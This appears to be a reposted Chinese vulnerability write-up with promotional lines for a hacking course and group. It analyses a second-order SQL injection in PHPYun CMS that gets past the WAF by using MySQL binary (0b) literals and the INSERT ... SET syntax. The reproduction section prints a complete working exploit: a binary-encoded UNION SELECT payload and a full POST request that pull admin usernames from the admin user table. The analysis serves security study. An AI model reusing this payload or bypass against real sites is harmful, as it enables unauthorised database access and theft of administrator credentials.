可領全套安全課程、配套攻防靶場

一.漏洞說明

這個漏洞涉及到了mysql中比較有意思的兩個知識點以及以table作為二次注入的突破口，非常的有意思。

此cms的防注入雖然是很變態的，但是卻可以利用mysql的這兩個特點繞過防禦。本次的漏洞是出現在ndex.class.php中的likejob_action()和saveresumeson_action()函數，由於這兩個函數對用戶的輸入沒有進行嚴格的顯示，同時利用mysql的特點能夠繞過waf。

PS:此漏洞的觸發需要在WAP環境下，所以在進行調試的時候需要修改瀏覽器的ua為Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

二.漏洞分析

mysql特點

特點1

傳統的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。

如果我們僅僅值需要插入一條記錄，則使用insert into test(content) values('hello2')。

如下圖所示:

但是實際上還存在另外一種方式能夠僅僅值插入一條記錄。

<code>insert into test set content='hello3';
/<code>

可以看到這種方式和insert into test(content) values('hello2')是一樣的。

說明插入數據時，利用values()和通過=指定列的方式結果都一樣

我們知道mysql中能夠使用十六進制表示字符串。如下：

其中0x68656c6c6f表示的就是hello

這是一個很常見的方式！

除了使用十六進制外，還可以使用二進制的方式進行插入。

hello的二進制是01101000 01100101 01101100 01101100 01101111，那麼我們的SQL語句還可以這樣寫,insert into test set content=0b0110100001100101011011000110110001101111。

這種方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一樣的。

mysql不僅可以使用十六進制插入，還可以使用二進制的方式插入

waf防護分析

waf的防護是位於config/db.safety.php

其中的gpc2sql()過濾代碼如下:

<code>function gpc2sql($str, $str2) {
    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {
        exit(safe_pape());
    }
    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {
        exit(safe_pape());
    }
    $arr = array("sleep" => "Ｓleep", " and " => " an d ", " or " => " Ｏr ", "xor" => "xＯr", "%20" => " ", "select" => "Ｓelect", "update" => "Ｕpdate", "count" => "Ｃount", "chr" => "Ｃhr", "truncate" => "Ｔruncate", "union" => "Ｕnion", "delete" => "Ｄelete", "insert" => "Ｉnsert", """ => "“", "'" => "“", "--" => "- -", "(" => "（", ")" => "）", "00000000" => "OOOOOOOO", "0x" => "Ox");
    foreach ($arr as $key => $v) {
        $str = preg_replace('/' . $key . '/isU', $v, $str);
    }
    return $str;
}
/<code>

可以看到將0x替換為了Ox,所以無法傳入十六進制，但是我們卻可以利用mysql中的二進制的特點，利用0b的方式傳入我們需要的payload。

index.class.php漏洞分析

漏洞是位於wap/member/model/index.class.php中，漏洞產生的主要函數是位於likejob_action()和saveresumeson_action()中。

我們首先分析likejob_action()。

likejob_action()的主要代碼如下：

而DB_update_all()的代碼如下：

<code>function DB_update_all($tablename, $value, $where = 1,$pecial=''){
    if($pecial!=$tablename){

        $where =$this->site_fetchsql($where,$tablename);
    }
    $SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where;
    $this->db->query("set sql_mode=''");
    $return=$this->db->query($SQL);
    return $return;
}
/<code>

也就是說，當數據進入到DB_update_all()之後就不會有任何的過濾。

那麼漏洞點就在於resume_expect中的job_classid字段。

job_classid字段的內容的傳遞如下圖所示：

所以如如果我們控制了resume_expect中的job_classid字段，我們就能夠修改這條語句了。

我們可以藉助於saveresumeson_action()來向job_classid中插入我們的payload。

saveresumeson_action()的關鍵代碼如下：

可以看到$table是直接通過"resume_".$_POST['table']拼接的，這也就以為著$table是我們可控的，之後$table進入了$this->obj->update_once()中。

我們進入uptate_once()中：

$table變量在update_once()沒有進行任何的處理，直接進入到DB_update_all()中，我們追蹤進入到DB_update_all()中:

同樣沒有進行任何的處理。

通過上面的跟蹤分析，表明$table="resume_".$_POST['table'];賦值之後，中途$table變量沒有進行任何的過濾直接進入了最終的SQL語句查詢。

如此整個攻擊鏈就成功了，我們通過saveresumeson_action()中的$table可控,對resume_expect中的job_classid進行修改，之後通過likejob_action()讀取job_classid字段的內容，執行我們的SQL語句。

由於我們無法使用十六進制，此時我們就需要使用到二進制(0b)插入我們的payload。

三.漏洞復現

註冊用戶/創建簡歷

註冊用戶創建簡歷。

此時在phpyun_resume_expect中存在一條id=1的記錄。

訪問saveresumeson

我們訪問saveresumeson對應的URL，寫入我們的payload。根據語法，我們需要將table的內容設置為

<code>expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #
/<code>

由於1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #無法繞過SQL的防禦，需要轉化為二進制，是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那麼最終的payload是:

<code>URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1
POST：name=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23
/<code>

此時我們執行的SQL語句是:

<code>INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET/<code>

最終數據庫中多了一條記錄，如下：

我們順利地向job_classid中插入了我們的的payload

訪問likejob_action觸發payload

接下來我們訪問http://localhost/member/index.php?c=likejob&id=7，其中的id就是剛剛我們插入的payload所對應記錄的id。

當運行至DB_select_all()中執行的SQL語句是：

為了便於分析，我們將這條SQL語句放入到datagrid中分析:

最終在頁面上顯示admin的信息。

至此整個漏洞都分析完畢了。

四.總結

一般來說，二次注入利用點一般都比較隱晦。

所以二次注入的思路比一般的注入更加巧妙和有意思，在本例中體現得尤為明顯。

1.這個二次注入的點比較難找，二次注入中的利用table作為二次注入的利用點的例子還是比較少見的；

2.繞過方法也比較少見。本例中的waf的防護還是比較嚴格的，利用了mysql的兩個少見特性就可以繞過了。

作者:天王蓋地虎 轉載自https://www.anquanke.com/post/id/170845

今天你知道了嗎

加群，黑客技術大咖在線解答(群號評論區見)

閱讀更多 暗網視界 的文章

關鍵字: Safari Chrome 瀏覽器